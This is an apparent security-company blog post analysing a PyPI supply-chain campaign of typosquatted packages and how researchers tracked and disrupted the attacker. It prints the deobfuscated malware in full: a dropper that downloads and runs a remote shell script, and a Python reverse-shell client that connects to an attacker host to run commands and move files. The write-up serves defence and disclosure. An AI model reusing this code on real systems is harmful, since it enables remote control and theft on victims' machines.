Disrupting a PyPI Software Supply Chain Threat Actor
Software supply chain attacks in the open-source ecosystem are frequent and pervasive. The cost of publishing a malicious package is low, while the payoff could be high - yielding keys to infrastructure, bank credentials, or cryptocurrency.
Phylum ingests all packages as they are published into these open-source ecosystems and analyzes the source files (over half a billion source files this year) to determine if they exhibit any indications of maliciousness.
Performing analysis at this scale allows us to make determinations about the behaviors of software supply chain threat actors over time. As these threat actors must work in public (given how open source works), it allows us to gain insight into their evolving tactics.
This is an overview of how we tracked an attacker (internally dubbed Gooberworm), monitored their development in real-time, and disrupted their campaign.
A burgeoning threat
On November 15, 2022, Phylum's system began notifying us of malicious packages being published to PyPI. Our automation capability immediately protected our users from this threat, and we published our findings to Twitter:
⚠️ #Python Malware: colurama
Appears to be associated with the attacks @Phylum_IO previously reported on!#pypi #malware #python3 #opensourceNovember 15, 2022
As the day went on, the list of published packages continued to grow:
colurama-> view on Phylum
coloroma-> view on Phylum
colorarise-> view on Phylum
randomized-> view on Phylum
msfpath->view on Phylum
Buried in each of these, as one might expect, was a bunch of obfuscated Python:
Many layers of obfuscation
The obfuscation here is comically bad (I’m sensing a pattern here). Replacing the
exec with a
Here is yet another layer of a different sort of obfuscation. However, unrolling it is exactly the same. Replace the
exec with a
In the third layer, the actor tried to be a bit trickier and compile the resulting source into Python bytecode. Replacing the last line with a
print(oIoeaTEAcvpae) gets us the underlying source.
import platform import subprocess if platform.system().startswith("Linux"): try: with open('/tmp/file.py', 'w') as f: f.write("import os \nimport subprocess \nfrom pathlib import Path \nfrom urllib import request \n") f.write("hello = os.getlogin() \n") f.write("PATH = '/home/' + hello + '/.msfdb.d'\n") f.write("PAT = '/tmp/file.py'\n") f.write("isExist = os.path.exists(PATH) \n") f.write("if not isExist:\n") f.write(" os.makedirs(PATH) \n") f.write("if Path(PATH).is_file(): \n") f.write(" print("") \n") f.write("else: \n") f.write(" remote_url = 'https://raw.githubusercontent.com/gobiwound/ab32/main/naopcEaovaeAvocpa.sh' \n") f.write(" local_file = PATH+'/msfdb.sh' \n") f.write(" request.urlretrieve(remote_url, local_file) \n") f.write(" subprocess.call(\"bash /home/$USER/.msfdb.d/msfdb.sh\", shell=True) \n") f.write(" if Path(PAT).is_file(): \n") f.write(" try:\n os.remove(PAT)\n") f.write(" except:\n print()") except FileNotFoundError: print("") subprocess.call("python3 /tmp/file.py &", shell=True) else: print("")
The actor then fetches something from GitHub, saves it locally as
msfdb.sh, and executes it. That, too, is heavily obfuscated, which makes it somewhat difficult to reason about. Helpfully though, the actor was kind enough to store everything in a Git repo that Phylum could access. At the time of publishing, the GitHub repo is still accessible at https://github.com/gobiwound/ab32.
Watching the attacker work in real-time
It was around this time that we decided to report the repo to GitHub in hopes that we would cut down another component of this actor’s attack infrastructure.
We also witnessed the attacker updating the obfuscation for their payload in real time, continuing to hone their attack for maximum efficacy.
By this time, Phylum had already ruined the campaign, but the attacker likely didn’t realize just how burned they were. It was time to let them know. For posterity, we cloned the existing Git repo and created a new issue in the attacker’s GitHub repository.
The attacker panics
The attacker continued his work for the next few hours, blissfully unaware of our newly minted issue.
When the actor did finally notice, they did what we can only assume was the first thing that came to mind: push a commit deleting all of the files from the repo. Unfortunately for them, they appear to be completely unaware of the fact that pushing a commit removing files doesn’t also remove those files from the Git history.
In an attempt to further hide their tracks, the actor also tried to clean up the issue we created. Phylum was one step ahead and ensured that an issue title change occurred, which prevented the attacker from completely removing all references to malware.
We can only assume “k” is the actor's response to us after we told them to “knock off” publishing malware on PyPI. Though we don’t expect that our attacker friend has any intentions of doing so.
Unrolling the remaining obfuscation
The question remains, though: what does the obfuscated bash script
naopcEaovaeAvocpa.sh in the Git repo do? Fortunately for us, the attacker committed the full history for this file, allowing us to get a good sense of the underlying functionality.
The attacker has contributed a few commits updating the obfuscation methods for this file. If we go back to the earliest commit touching this file, we find a file rename: from
Surely the attacker wasn’t dumb enough to commit the original file completely unobfuscated… right? Spoiler alert: they were.
At a high level, the bash checks to see if
msfpath exists on the system. If it doesn’t, the package is
pip installed. It then attempts to import
msfpath and execute it.
msfpath contains additional obfuscation, but using the tried and true replace eval with print, we were able to get back to the original Python for
import socket import json import subprocess import time import os def reliable_send(data): jsondata = json.dumps(data) s.send(jsondata.encode()) def reliable_recv(): data = '' while True: try: data = data + s.recv(1024).decode().rstrip() return json.loads(data) except ValueError: continue def download_file(file_name): f = open(file_name, 'wb') s.settimeout(1) chunk = s.recv(1024) while chunk: f.write(chunk) try: chunk = s.recv(1024) except socket.timeout as e: break s.settimeout(None) f.close() def upload_file(file_name): f = open(file_name, 'rb') s.send(f.read()) def connection(): while True: time.sleep(4) try: s.connect(('hellwound.bounceme.net', 6003)) shell() s.close() break except: connection() def shell(): while True: command = reliable_recv() if command == 'quit': break elif command == 'background': pass elif command == 'help': pass elif command == 'clear': pass elif command[:3] == 'cd ': os.chdir(command[3:]) if command[:3] == 'res ': reliable_send(True) break elif command[:6] == 'upload': download_file(command[7:]) elif command[:8] == 'download': upload_file(command[9:]) elif command[:7] == 'sendall': subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE) else: execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE) result = execute.stdout.read() + execute.stderr.read() result = result.decode() reliable_send(result) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def catc(): try: connection() except KeyboardInterrupt: quit() catc()
The script makes a connection to
hellwound.bounceme.net (a no-IP DDNS hostname). It receives data from this server and, depending on the command received, takes action on the infected machine.
The attacker’s intentions are now clear: infect as many machines as possible by way of infected Python packages, and build an army of attacker-controlled bots.
And what about
cronjob.out that appears in the Git repo? What’s the purpose of this file in this whole scheme? We’ll be publishing a follow-up post outlining how one of our engineers busted out Ghidra to make sense of this file.
This is not the end
At this point, the attacker's malicious packages have been removed. We reported their GitHub repository, reported their host to no-IP and publicly shamed them. Software supply chain attack thwarted!
While we successfully disrupted this campaign, rest assured this is not the last time we’ll see this threat actor. They’ll be back with updated TTPs, targeting software engineers with innocuous packages that subtly insert malware onto developer machines. The attackers are numerous and persistent; a true software Hydra - cut off the head of one attacker and two more attackers take their place.
Thus, we as engineers, must remain vigilant - checking each piece of software that we pull into our builds in an automated fashion, to block threats at the source.
With this in mind, we’ll leave all the attackers - who I’m sure are reading this - with the following: